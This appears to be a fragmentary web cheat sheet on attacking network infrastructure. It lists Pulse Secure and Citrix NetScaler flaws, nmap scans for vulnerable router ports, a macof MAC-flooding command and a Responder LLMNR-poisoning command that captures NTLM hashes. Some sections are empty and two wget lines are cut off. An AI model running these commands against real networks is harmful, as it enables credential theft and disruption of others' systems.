✅ Exploiting Network infrastructure

Attacks on Network equipment: Routers, Switches, VPN



Hardcoded credentials vulnerabilities:


VPN Servers

Pulse Secure SSL VPN 8.1R15.1 / 8.2 / 8.3 / 9.0 Arbitrary File Disclosure
CVSS 10.0 Metasploit exploit:

Citrix NetScaler


On Dec. 17, 2019, a directory traversal vulnerability was announced in the Citrix Application Discovery Controller and Citrix Gateway, which would allow a remote, unauthenticated user to write a file to a location on disk. Affected products include:

  • Citrix ADC and Citrix Gateway version 13.0 all supported builds
  • Citrix ADC and NetScaler Gateway version 12.1 all supported builds
  • Citrix ADC and NetScaler Gateway version 12.0 all supported builds
  • Citrix ADC and NetScaler Gateway version 11.1 all supported builds
  • Citrix NetScaler ADC and NetScaler Gateway version 10.5 all supported builds


Home routers

Scan for CVE-2015-3036 (NetUSB Kcodes):

nmap -p 20005 --open 192.168.1.*

Scan for CWMP Modem RCE / XXE:

nmap -p 7457 --open 192.168.1.*

Scan for faximum:

nmap -p 7437 --open 192.168.1.*

Scan for UPnP

nmap -p 37215 -sV --open 192.168.1.*
wget -O -
wget -O -

Physical access exploitation (LAN)

MAC flooding

macof -n 1000



LLMNR poisoning

Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.

responder -I eth0 -rv


How useful was this post?

Click on a star to rate it!

We are sorry that this post was not useful for you!

Let us improve this post!

Tell us how we can improve this post?